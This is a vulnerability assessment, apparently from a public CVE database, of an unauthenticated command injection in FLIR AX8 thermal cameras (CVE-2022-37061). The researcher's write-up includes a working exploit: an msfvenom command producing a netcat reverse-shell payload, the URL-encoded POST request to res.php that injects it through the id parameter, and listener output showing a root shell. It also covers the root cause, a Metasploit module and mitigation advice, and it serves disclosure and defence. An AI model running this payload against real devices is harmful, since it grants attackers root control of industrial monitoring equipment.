CVE-2022-37061

All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.

Recent assessments:

h00die-gr3y at October 20, 2022 7:41pm UTC reported:

FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
This device is typically used for monitoring industrial environments in a LAN based configuration. Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including 1.46.16.

The endpoint /res.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command as demonstrated in the example below.

Create a netcat reverse shell payload with msfvenom

# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.100.7 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/ibcnr; nc 192.168.100.7 4444 0</tmp/ibcnr | /bin/sh >/tmp/ibcnr 2>&1; rm /tmp/ibcnr

Use this payload in a burp POST request using the vulnerable id parameter to launch a netcat shell.
Note: Do not forget to apply the URL encoding.

POST /res.php HTTP/1.1
Host: 192.168.100.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 174

action=alarm&id=2;mkfifo%20%2ftmp%2fibcnr%3b%20nc%20192.168.100.7%204444%200%3c%2ftmp%2fibcnr%20%7c%20%2fbin%2fsh%20%3e%2ftmp%2fibcnr%202%3e%261%3b%20rm%20%2ftmp%2fibcnr

Click send and you will receive a netcat shell on the attacker host.

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51556
whoami
root
uname -a
Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux

The root cause of this command injection vulnerability is the lack of sanitization checks on the variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php and malicious actors can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.

Besides this vulnerability, three other vulnerabilities were identified. Check the respective CVE’s for more info.

• [CVE-2022-37060] – Unauthenticated Directory Traversal

• [CVE-2022-37062] – Improper Access Control

• [CVE-2022-37063] – Reflected cross-site scripting

As stated in the beginning of this analysis, it very unlikely to find this type of devices exposed to the Internet, but you will find them quite often in industrial environments deployed in a LAN based configuration.

I have created Metasploit module exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061 that will check if the device is vulnerable and launches a reverse netcat shell or meterpreter session on a vulnerable device . You can download this module from the link in the reference section below and follow the instructions to run it locally.

Pushing this module to the Metasploit mainstream is in progress.

Mitigation

Upgrade camera version to a higher firmware version then 1.46.16.

References

Packetstorm
Metasploit Development h00die-gr3y

Credits

Credits goes to the security researchers below who discovered these vulnerabilities.

• Thomas Knudsen

• Samy Younsi

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5